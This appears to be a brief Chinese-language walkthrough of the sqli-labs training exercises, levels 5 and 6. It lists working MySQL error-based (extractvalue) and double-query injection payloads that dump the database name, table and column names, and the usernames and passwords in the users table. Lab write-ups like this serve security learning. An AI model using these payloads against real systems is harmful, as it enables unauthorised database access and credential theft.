sqli lab less-5-6

less-5

1. 基於報錯的注入

• 基於報錯可以爆出當前數據庫名等等
  id=2’ and extractvalue(1, concat(0x7c,(select user())));-- #
  
  ?id=2’ and extractvalue(1, concat(0x7c,(select @@version)));-- #
  
  ?id=2’ and extractvalue(1, concat(0x7c,(select database())));-- #
  
• 爆當前數據庫表
  ?id=2’ and extractvalue(1, concat(0x7c,(
  select group_concat(table_name) from information_schema.tables where table_schema=database()
  )));-- #
  
• 爆字段
  ?id=2’ and extractvalue(1, concat(0x7c,(
  select group_concat(column_name) from information_schema.columns where table_name=‘users’
  )));-- #
  
• 爆數據
  ?id=2’ and extractvalue(1, concat(0x7c,(
  select group_concat(username) from users
  )));-- #
  ?id=2’ and extractvalue(1, concat(0x7c,(
  select group_concat(password) from users
  )));-- #
  
  
• 這種方式爆出數據較少,可能爆不出想要的數據

2. 雙查詢注入
   原理:https://www.2cto.com/article/201303/192718.html

?id=2’ union select 1,count(*), concat((
select password from users limit 2,1
), floor(rand()*2))as a from information_schema.tables group by a;
– #
修改limit
可以一條一條的爆出信息

• 上面基於xpath報錯的函數也可以一條一條爆出信息
  ?id=2’ and extractvalue(1, concat(0x7c,(
  select password from users limit 1,1
  )));-- #

less-6

同上 " 閉合